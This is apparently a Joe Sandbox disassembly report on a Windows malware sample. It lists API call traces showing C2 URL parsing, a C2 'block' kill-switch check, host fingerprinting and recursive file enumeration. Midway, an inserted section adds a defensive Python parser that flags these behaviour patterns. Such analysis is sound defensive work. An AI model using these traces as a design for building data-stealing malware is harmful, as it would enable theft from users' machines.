                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$lstrcpy$CloseHandleHttp$FileOpenReadRequest$ConnectInfoOptionQuerySend
                                    • String ID: ERROR$GET$pS
                                    • API String ID: 3687753495-795038753
                                    • Opcode ID: 369a59ffe17a8c5cbf05f051ec94ba8e70cecc0aa8d449cf8aaedcb73ab5dae1
                                    • Instruction ID: e8049413e6433234a60eb29c7972744bc1ab6f11483593203d042ce4b6ba2fd5
                                    • Opcode Fuzzy Hash: 369a59ffe17a8c5cbf05f051ec94ba8e70cecc0aa8d449cf8aaedcb73ab5dae1
                                    • Instruction Fuzzy Hash: 3D815A71A01219ABEB20DFA4DC49FAE77B8FF44700F144168BA05E7280EB74ED05CBA1

                                    Control-flow Graph (legend: Executed / Not Executed; function blocks 8d8d00-8d8f4f, rendered graph not reproduced in text)
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExitProcess
                                    • String ID: block
                                    • API String ID: 621844428-2199623458
                                    • Opcode ID: 105468ebb906276ee43720a006808be73f886e0ea423f86826578c4cacc23840
                                    • Instruction ID: 820b43d02d385dc14f587f245d5cede649c4d74f2771e829735562e25730766a
                                    • Opcode Fuzzy Hash: 105468ebb906276ee43720a006808be73f886e0ea423f86826578c4cacc23840
                                    • Instruction Fuzzy Hash: 425139B0644A05EFC7209FB5E884B3B7BF5FB44B08B104A2EE592DA760DF78E4418B51

                                    Control-flow Graph (legend: Executed / Not Executed; function blocks 8e26e0-8e2812, rendered graph not reproduced in text)
                                    APIs
                                    • GetWindowsDirectoryA.KERNEL32(00000000,00000104,00000000,00000000,00000000), ref: 008E271B
                                    • GetVolumeInformationA.KERNEL32(?,00000000,00000000,008D9416,00000000,00000000,00000000,00000000), ref: 008E274C
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 008E27AF
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 008E27B6
                                    • wsprintfA.USER32 ref: 008E27DB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowswsprintf
                                    • String ID: :\$C
                                    • API String ID: 2572753744-3309953409
                                    • Opcode ID: 552e6847a073f157116343ff19e0c2bc004b27da065e3ef39f0336820337a1d9
                                    • Instruction ID: 804281875483187cc9f129b346b96238548edf3c8b634e39094fc8164e7ffa91
                                    • Opcode Fuzzy Hash: 552e6847a073f157116343ff19e0c2bc004b27da065e3ef39f0336820337a1d9
                                    • Instruction Fuzzy Hash: AD315EB19082499BCB14CFF99D85AAFBFBCFB59744F000169E505E7650E2349A008BA1

Control-flow Graph (rendered graph with Executed / Not Executed colouring omitted; node listing): 8c4ae0-8c4aee; 8c4af0-8c4af5 (self-loop); 8c4af7-8c4b68 ??2@YAPAXI@Z x3, lstrlen, InternetCrackUrlA, call 8c2930.
                                    APIs
                                    • ??2@YAPAXI@Z.MSVCRT(00000800,?), ref: 008C4B17
                                    • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 008C4B21
                                    • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 008C4B2B
                                    • lstrlen.KERNEL32(?,00000000,?), ref: 008C4B3F
                                    • InternetCrackUrlA.WININET(?,00000000), ref: 008C4B47
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
• Associated: the same 14 dump regions (008C0000 through 00F50000) listed under the first function record above.
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ??2@$CrackInternetlstrlen
                                    • String ID: <
                                    • API String ID: 1683549937-4251816714
                                    • Opcode ID: d56fa4313a1602cf9f5e5a77cbbfdb64953a100a309c5aba9dc355cc0e070267
                                    • Instruction ID: deb17bb72578fc03a66b27ef3b3181a082378e96e33871b35d6dbc7fc16e1329
                                    • Opcode Fuzzy Hash: d56fa4313a1602cf9f5e5a77cbbfdb64953a100a309c5aba9dc355cc0e070267
                                    • Instruction Fuzzy Hash: 6A011B71D00218AFDB00DFA9EC45B9EBBB8EB08320F00412AF914E7290DB745905CBD4

Control-flow Graph (rendered graph with Executed / Not Executed colouring omitted; node listing): 8defe0-8df005 call 8c2840; 8df007-8df00f; 8df011-8df013 lstrcpy; 8df019-8df01d call 8c6b80; 8df022-8df038 StrCmpCA, branching either to 8df03a-8df052 (call 8c2930, call 8c2840; 8df054-8df05c; 8df05e-8df05f) or to 8df061-8df068 (call 8c2930; loop 8df070-8df078; 8df07a-8df087 call 8c2840; 8df089); both branches reach 8df095-8df0f0 call 8c2930 x10, optionally via 8df08e-8df08f lstrcpy.
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008DF013
                                    • StrCmpCA.SHLWAPI(?,ERROR), ref: 008DF02E
                                    • lstrcpy.KERNEL32(00000000,ERROR), ref: 008DF08F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
• Associated: the same 14 dump regions (008C0000 through 00F50000) listed under the first function record above.
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy
                                    • String ID: ERROR
                                    • API String ID: 3722407311-2861137601
                                    • Opcode ID: a4516453c1deb5cab6b0a301d5df676b8277b26c53e99e7ac4b56ba50710ad48
                                    • Instruction ID: aa1c3a054a1e0dde221d1d276953fab834a350e0746500512e9b6740d6964479
                                    • Opcode Fuzzy Hash: a4516453c1deb5cab6b0a301d5df676b8277b26c53e99e7ac4b56ba50710ad48
                                    • Instruction Fuzzy Hash: CE21EA70610A069BCB24BF79C846FAA3BB4FF04304F444629B949DB293DF30DC258791

Control-flow Graph (rendered graph with Executed / Not Executed colouring omitted; node listing): 8d8ce1-8d8d24 StrCmpCA, then 8d8d26-8d8d27 ExitProcess or 8d8d2d-8d8d46; 8d8d4c-8d8d51; 8d8d56-8d8d59; dispatch block 8d8d5f fanning out to thirteen blocks, nine doing StrCmpCA (8d8de4, 8d8e04, 8d8e1d, 8d8e3d, 8d8e5d, 8d8e7d, 8d8e9d, 8d8eb6, 8d8ecf) and four doing lstrlen followed by call 8c2930 / call 8c2840 (8d8d66, 8d8d90, 8d8dba, 8d8ee8), the latter joining at 8d8f13-8d8f1d lstrcpy; all paths converge at 8d8f23-8d8f3c, which loops back through 8d8d53 to 8d8d56 or exits to 8d8f42-8d8f4f call 8c2930.
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
• Associated: the same 14 dump regions (008C0000 through 00F50000) listed under the first function record above.
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExitProcess
                                    • String ID: block
                                    • API String ID: 621844428-2199623458
                                    • Opcode ID: 63c74883ee9c1cab07a45cf96c74f4fc555039d25b572f6093118541a5110776
                                    • Instruction ID: 2c2bbe82efd5122f8cbf6edb181fa06275062febba8a5fd1985a0aebb5107422
                                    • Opcode Fuzzy Hash: 63c74883ee9c1cab07a45cf96c74f4fc555039d25b572f6093118541a5110776
                                    • Instruction Fuzzy Hash: 7AE09A3090434EFBCB10EBB4CDA8DAB7B78EF04340B00152DA600D7282DB249A04CB19

Control-flow Graph (rendered graph with Executed / Not Executed colouring omitted; node listing): 8e2a70-8e2ac2 GetProcessHeap, RtlAllocateHeap, GetComputerNameA, then 8e2ae4-8e2af9 or 8e2ac4-8e2ad6.
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 008E2A9F
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 008E2AA6
                                    • GetComputerNameA.KERNEL32(00000000,00000104), ref: 008E2ABA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
• Associated: the same 14 dump regions (008C0000 through 00F50000) listed under the first function record above.
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateComputerNameProcess
                                    • String ID:
                                    • API String ID: 1664310425-0
                                    • Opcode ID: 2b281b8cc5efc6503161714c6de6f58c89301adcda9aae091ed4e68763f41f87
                                    • Instruction ID: f8f2d5a4ddf703dd8053c831b048581660b53bf737018a78bc5bc7de3a96bffe
                                    • Opcode Fuzzy Hash: 2b281b8cc5efc6503161714c6de6f58c89301adcda9aae091ed4e68763f41f87
                                    • Instruction Fuzzy Hash: 1001D172A44658ABD710CFD9EC45BAAFBBCF744B21F00026AFA19D3780DB741904C6A1
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008D2774
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D2797
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008D27A2
                                    • lstrlen.KERNEL32(\*.*), ref: 008D27AD
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D27CA
                                    • lstrcat.KERNEL32(00000000,\*.*), ref: 008D27D6
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D280A
                                    • FindFirstFileA.KERNEL32(00000000,?), ref: 008D2826
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
• Associated: the same 14 dump regions (008C0000 through 00F50000) listed under the first function record above.
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                    • String ID: \*.*
                                    • API String ID: 2567437900-1173974218
                                    • Opcode ID: 4c99977fccaeff6898c3b9919e117ace11977d50803287e70a556015bf0a8a74
                                    • Instruction ID: 542de409ddc2affffb31a5519bba1a4dc55be326d1b152115eada2df02bbb3cf
                                    • Opcode Fuzzy Hash: 4c99977fccaeff6898c3b9919e117ace11977d50803287e70a556015bf0a8a74
                                    • Instruction Fuzzy Hash: AFA208719016169BCB21AFB8DC89F6E7BB9FF44700F044629A805E7361DB34DD06CB92
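The function records above are easier to triage when the "APIs" lists are parsed rather than read: the call sequence plus the resolved string arguments (":\" and "C" next to GetVolumeInformationA, "\*.*" next to FindFirstFileA, "ERROR" and "block" in StrCmpCA) is what tells you what each routine is for. The following is an added example, not code from the Joe Sandbox report or from the analysed sample: a small Python parser for the API lines in this report format, with behaviour predicates of my own (the pattern names and the call combinations they key on are assumptions, not Joe Sandbox signatures). The sample input is copied, abridged, from the records on this page.

```python
"""Parse the per-function "APIs" lists of a Joe Sandbox IDA-plugin report and
flag behaviour patterns.  Added example, not code from the report or from the
analysed sample; the behaviour predicates are this example's own assumptions."""
import re
from dataclasses import dataclass

# Constructed input: "APIs" records copied (abridged) from the listings above.
SAMPLE_REPORT = r"""
APIs
• GetWindowsDirectoryA.KERNEL32(00000000,00000104,00000000,00000000,00000000), ref: 008E271B
• GetVolumeInformationA.KERNEL32(?,00000000,00000000,008D9416,00000000,00000000,00000000,00000000), ref: 008E274C
• GetProcessHeap.KERNEL32(00000000,00000104), ref: 008E27AF
• RtlAllocateHeap.NTDLL(00000000), ref: 008E27B6
• wsprintfA.USER32 ref: 008E27DB
APIs
• ??2@YAPAXI@Z.MSVCRT(00000800,?), ref: 008C4B17
• lstrlen.KERNEL32(?,00000000,?), ref: 008C4B3F
• InternetCrackUrlA.WININET(?,00000000), ref: 008C4B47
APIs
• lstrcpy.KERNEL32(00000000,?), ref: 008DF013
• StrCmpCA.SHLWAPI(?,ERROR), ref: 008DF02E
• lstrcpy.KERNEL32(00000000,ERROR), ref: 008DF08F
APIs
• lstrcpy.KERNEL32(00000000,008ED014), ref: 008C15E2
• lstrcat.KERNEL32(00000000,\*.*), ref: 008C189A
  • Part of subcall function 008E4020: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 008E404D
• FindFirstFileA.KERNEL32(00000000,?), ref: 008C1A45
"""

# One report line: optional "Part of subcall function XXXXXXXX:" prefix,
# "api.MODULE", optional "(args)", then "ref: XXXXXXXX".
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>[^.\s]+)\.(?P<module>[A-Za-z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)
HEX_ADDR = re.compile(r"[0-9A-F]{8}")


@dataclass(frozen=True)
class ApiCall:
    api: str
    module: str
    args: tuple       # argument strings as printed; "?" means unresolved
    ref: str          # address of the call instruction
    in_subcall: bool  # True for "Part of subcall function" lines


def parse_records(text):
    """Split the text at "APIs" headers; one list of ApiCall per function."""
    records, current = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = []
            records.append(current)
            continue
        m = API_LINE.match(line)
        if not m:
            continue
        if current is None:  # API line before any "APIs" header
            current = []
            records.append(current)
        args = tuple(a for a in (m.group("args") or "").split(",") if a)
        current.append(ApiCall(m.group("api"), m.group("module"), args,
                               m.group("ref"), m.group("sub") is not None))
    return records


def is_literal(arg):
    """True when the argument was resolved to a string, not a raw value or "?"."""
    return arg != "?" and HEX_ADDR.fullmatch(arg) is None


def _calls(rec, *names):
    present = {c.api for c in rec}
    return all(n in present for n in names)


# Assumed behaviour predicates (this example's own, not Joe Sandbox signatures).
PATTERNS = {
    "volume-serial host fingerprint":
        lambda rec: _calls(rec, "GetWindowsDirectoryA", "GetVolumeInformationA"),
    "hostname collection":
        lambda rec: _calls(rec, "GetComputerNameA"),
    "directory enumeration (path + \\*.*)":
        lambda rec: _calls(rec, "FindFirstFileA") and any(r"\*.*" in c.args for c in rec),
    "C2 URL parsing":
        lambda rec: _calls(rec, "InternetCrackUrlA"),
    "C2 response keyword check":
        lambda rec: any(c.api == "StrCmpCA" and any(is_literal(a) for a in c.args)
                        for c in rec),
}


def summarize(text):
    """Per record: first own call address, call count, string literals, patterns."""
    out = []
    for rec in parse_records(text):
        own = [c for c in rec if not c.in_subcall]
        out.append({
            "first_ref": own[0].ref if own else None,
            "calls": len(rec),
            "literals": sorted({a for c in rec for a in c.args if is_literal(a)}),
            "patterns": sorted(n for n, pred in PATTERNS.items() if pred(rec)),
        })
    return out


if __name__ == "__main__":
    for s in summarize(SAMPLE_REPORT):
        print(f"{s['first_ref']}: {s['calls']} calls, literals={s['literals']}, "
              f"patterns={s['patterns']}")
```

Run against a whole report, the summary gives one line per function with the literals it compares against or builds paths from, which is usually enough to pick the C2 handler, the fingerprinting routine and the file-grabber out of several hundred functions without opening each record; add predicates for whatever other call combinations the sample under analysis shows.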
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008C15E2
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008C1619
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008C166C
                                    • lstrcat.KERNEL32(00000000), ref: 008C1676
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008C16A2
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008C16EF
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008C16F9
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008C1725
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008C1775
                                    • lstrcat.KERNEL32(00000000), ref: 008C177F
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008C17AB
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008C17F3
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008C17FE
                                    • lstrlen.KERNEL32(008F1D5C), ref: 008C1809
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008C1829
                                    • lstrcat.KERNEL32(00000000,008F1D5C), ref: 008C1835
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008C185B
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008C1866
                                    • lstrlen.KERNEL32(\*.*), ref: 008C1871
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008C188E
                                    • lstrcat.KERNEL32(00000000,\*.*), ref: 008C189A
                                      • Part of subcall function 008E4020: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 008E404D
                                      • Part of subcall function 008E4020: lstrcpy.KERNEL32(00000000,?), ref: 008E4082
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008C18C3
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008C190E
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008C1916
                                    • lstrlen.KERNEL32(008F1D5C), ref: 008C1921
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008C1941
                                    • lstrcat.KERNEL32(00000000,008F1D5C), ref: 008C194D
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008C1976
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008C1981
                                    • lstrlen.KERNEL32(008F1D5C), ref: 008C198C
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008C19AC
                                    • lstrcat.KERNEL32(00000000,008F1D5C), ref: 008C19B8
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008C19DE
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008C19E9
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008C1A11
                                    • FindFirstFileA.KERNEL32(00000000,?), ref: 008C1A45
                                    • StrCmpCA.SHLWAPI(?,008F1D68), ref: 008C1A70
                                    • StrCmpCA.SHLWAPI(?,008F1D6C), ref: 008C1A8A
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008C1AC4
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008C1AFB
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008C1B03
                                    • lstrlen.KERNEL32(008F1D5C), ref: 008C1B0E
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008C1B31
                                    • lstrcat.KERNEL32(00000000,008F1D5C), ref: 008C1B3D
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008C1B69
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008C1B74
                                    • lstrlen.KERNEL32(008F1D5C), ref: 008C1B7F
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008C1BA2
                                    • lstrcat.KERNEL32(00000000,008F1D5C), ref: 008C1BAE
                                    • lstrlen.KERNEL32(?), ref: 008C1BBB
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008C1BDB
                                    • lstrcat.KERNEL32(00000000,?), ref: 008C1BE9
                                    • lstrlen.KERNEL32(008F1D5C), ref: 008C1BF4
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008C1C14
                                    • lstrcat.KERNEL32(00000000,008F1D5C), ref: 008C1C20
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008C1C46
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008C1C51
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008C1C7D
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008C1CE0
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008C1CEB
                                    • lstrlen.KERNEL32(008F1D5C), ref: 008C1CF6
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008C1D19
                                    • lstrcat.KERNEL32(00000000,008F1D5C), ref: 008C1D25
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008C1D4B
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008C1D56
                                    • lstrlen.KERNEL32(008F1D5C), ref: 008C1D61
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008C1D81
                                    • lstrcat.KERNEL32(00000000,008F1D5C), ref: 008C1D8D
                                    • lstrlen.KERNEL32(?), ref: 008C1D9A
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008C1DBA
                                    • lstrcat.KERNEL32(00000000,?), ref: 008C1DC8
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008C1DF4
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008C1E3E
                                    • GetFileAttributesA.KERNEL32(00000000), ref: 008C1E45
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008C1E9F
                                    • lstrlen.KERNEL32(00538F88), ref: 008C1EAE
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008C1EDB
                                    • lstrcat.KERNEL32(00000000,?), ref: 008C1EE3
                                    • lstrlen.KERNEL32(008F1D5C), ref: 008C1EEE
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008C1F0E
                                    • lstrcat.KERNEL32(00000000,008F1D5C), ref: 008C1F1A
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008C1F42
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008C1F4D
                                    • lstrlen.KERNEL32(008F1D5C), ref: 008C1F58
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008C1F75
                                    • lstrcat.KERNEL32(00000000,008F1D5C), ref: 008C1F81
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
• Associated: the same 14 dump regions (008C0000 through 00F50000) listed under the first function record above.
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$lstrlen$File$AttributesFindFirstFolderPath
                                    • String ID: \*.*
                                    • API String ID: 4127656590-1173974218
                                    • Opcode ID: 03bee48ea9c96f243d7d439b845d3d2fa3e4223248d47aa18fd006978f398cf2
                                    • Instruction ID: bd5f0607a8bdee5a097b21a7cb5921ab4a256cddaa8b1b794e64708d8e2561d2
                                    • Opcode Fuzzy Hash: 03bee48ea9c96f243d7d439b845d3d2fa3e4223248d47aa18fd006978f398cf2
                                    • Instruction Fuzzy Hash: 7992FB7190161A9BCB21EFA8D989FAF7BB9FF45700F044128B905E7252DB34DD06CBA1
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008D1C72
                                    • lstrlen.KERNEL32(\*.*), ref: 008D1C7D
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008D1C9F
                                    • lstrcat.KERNEL32(00000000,\*.*), ref: 008D1CAB
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D1CD2
                                    • FindFirstFileA.KERNEL32(00000000,?), ref: 008D1CE7
                                    • StrCmpCA.SHLWAPI(?,008F1D68), ref: 008D1D07
                                    • StrCmpCA.SHLWAPI(?,008F1D6C), ref: 008D1D21
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008D1D5F
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008D1D92
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008D1DBA
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008D1DC5
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D1DEC
                                    • lstrlen.KERNEL32(008F1D5C), ref: 008D1DFE
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D1E20
                                    • lstrcat.KERNEL32(00000000,008F1D5C), ref: 008D1E2C
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D1E54
                                    • lstrlen.KERNEL32(?), ref: 008D1E68
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D1E85
                                    • lstrcat.KERNEL32(00000000,?), ref: 008D1E93
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D1EB9
                                    • lstrlen.KERNEL32(00538F38), ref: 008D1ECF
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D1EF9
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008D1F04
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D1F2F
                                    • lstrlen.KERNEL32(008F1D5C), ref: 008D1F41
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D1F63
                                    • lstrcat.KERNEL32(00000000,008F1D5C), ref: 008D1F6F
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D1F98
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D1FC5
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008D1FD0
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D1FF7
                                    • lstrlen.KERNEL32(008F1D5C), ref: 008D2009
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D202B
                                    • lstrcat.KERNEL32(00000000,008F1D5C), ref: 008D2037
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D2060
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D208F
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008D209A
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D20C1
                                    • lstrlen.KERNEL32(008F1D5C), ref: 008D20D3
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D20F5
                                    • lstrcat.KERNEL32(00000000,008F1D5C), ref: 008D2101
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D212A
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D2159
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008D2164
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D218D
                                    • lstrlen.KERNEL32(008F1D5C), ref: 008D21B9
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D21D6
                                    • lstrcat.KERNEL32(00000000,008F1D5C), ref: 008D21E2
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D2208
                                    • lstrlen.KERNEL32(0053D0A0), ref: 008D221E
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D2252
                                    • lstrlen.KERNEL32(008F1D5C), ref: 008D2266
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D2283
                                    • lstrcat.KERNEL32(00000000,008F1D5C), ref: 008D228F
